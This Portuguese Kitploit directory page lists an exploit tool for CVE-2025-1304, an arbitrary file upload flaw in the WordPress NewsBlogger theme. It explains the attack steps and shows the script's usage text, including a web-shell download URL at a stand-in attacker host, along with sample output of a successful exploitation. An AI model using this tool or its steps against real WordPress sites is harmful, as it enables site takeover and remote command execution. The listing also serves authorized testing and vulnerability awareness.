Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-1304 — WordPress NewsBlogger Theme <= 0.2.5.1 é vulnerável a Upload Arbitrário de Arquivos | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-1304
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-1304

CVE-2025-1304

WordPress NewsBlogger Theme <= 0.2.5.1 é vulnerável a Upload Arbitrário de Arquivos

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 Tema NewsBlogger do WordPress <= 0.2.5.1 - Upload Arbitrário de Arquivo (CVE-2025-1304)

Pontuação CVSS: 8.8 (Alto)
Tipo de Vulnerabilidade: Upload Arbitrário de Arquivo
Componente: Tema WordPress
ID CVE: CVE-2025-1304


🔥 Visão Geral da Vulnerabilidade

O tema NewsBlogger do WordPress (versões <= 0.2.5.1) é vulnerável a um Upload Arbitrário de Arquivo através do painel de boas-vindas do administrador.

Esta vulnerabilidade permite que qualquer usuário autenticado — incluindo aqueles com a função mínima de Assinante — faça upload de um arquivo .zip malicioso contendo um web shell.
O upload ocorre através de um campo de URL de plugin não validado, que falha em verificar adequadamente o conteúdo ou tipo do arquivo enviado.

Um ataque bem-sucedido pode levar ao comprometimento total do site, incluindo execução remota de comandos e escalonamento de privilégios.


🧠 Detalhes do Script

Este script Python automatiza a exploração da vulnerabilidade ao:

  • Fazer login usando as credenciais de administrador fornecidas.
  • Extrair o nonce dinamicamente da página de boas-vindas vulnerável.
  • Enviar um plugin malicioso remoto através do endpoint AJAX vulnerável.

⚙️ Instruções de Uso

root@kitploit:~
python CVE-2025-1304.py -h
root@kitploit:~
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB

WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )

options:
  -h, --help                show this help message and exit
  --url, -u URL             Target base URL (e.g., http://target/wordpress)
  --username, -un USERNAME WordPress admin username
  --password, -p PASSWORD   WordPress admin password
  --shellweb, -shell SHELLWEB
                           Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)

📤 Exemplo de Saída

root@kitploit:~
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}

⚠️ Isenção de Responsabilidade

Este código é fornecido apenas para fins educacionais e testes de segurança autorizados.
O autor não assume nenhuma responsabilidade por uso indevido ou danos causados por esta ferramenta.


Por: Nxploited ( Khaled Alenazi )

Baixar ferramenta